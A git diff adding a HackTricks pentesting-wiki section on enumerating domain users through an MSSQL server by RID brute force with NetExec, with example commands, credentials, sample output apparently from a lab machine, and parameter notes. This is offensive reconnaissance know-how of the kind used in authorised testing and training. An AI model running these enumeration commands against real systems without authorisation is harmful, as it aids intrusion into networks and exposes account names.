HackTricks-wiki · carlospolop · Nov 23, 2025 · Nov 23, 2025
diff --git a/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md b/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
@@ -79,6 +79,42 @@ msf> use windows/manage/mssql_local_auth_bypass
 
 ### [**Brute force**](../../generic-hacking/brute-force.md#sql-server)
 
+### **User Enumeration via RID Brute Force**
+
+You can enumerate domain users through MSSQL by brute-forcing RIDs (Relative Identifiers). This technique is useful when you have valid credentials but limited privileges:
+```bash
+# Using NetExec (nxc) - formerly CrackMapExec
+nxc mssql <IP> --local-auth -u <username> -p '<password>' --rid-brute 5000
+
+# Examples:
+nxc mssql 10.129.234.50 --local-auth -u sqlguest -p 'zDPBpaF4FywlqIv11vii' --rid-brute 5000
+nxc mssql 10.10.10.59 -u sa -p 'P@ssw0rd' --rid-brute 10000
+
+# Without --local-auth for domain accounts
+nxc mssql 10.10.10.59 -u DOMAIN\\user -p 'password' --rid-brute 5000
+```
+
+Expected output:
+
+```
+[snippet]
+MSSQL                    10.129.234.50   1433   DC               1104: REDELEGATE\Christine.Flanders
+MSSQL                    10.129.234.50   1433   DC               1105: REDELEGATE\Marie.Curie
+MSSQL                    10.129.234.50   1433   DC               1106: REDELEGATE\Helen.Frost
+MSSQL                    10.129.234.50   1433   DC               1107: REDELEGATE\Michael.Pontiac
+MSSQL                    10.129.234.50   1433   DC               1108: REDELEGATE\Mallory.Roberts
+MSSQL                    10.129.234.50   1433   DC               1109: REDELEGATE\James.Dinkleberg
+[snippet]
+```
+
+**Parameters:**
+- `--local-auth`: Use local authentication instead of domain
+- `--rid-brute <max_rid>`: Brute force RIDs up to the specified number (default: 4000)
+- `-u`: Username
+- `-p`: Password
+
+This technique will enumerate users by querying the MSSQL server for account information associated with sequential RIDs.
+
 ### Manual Enumeration
 
 #### Login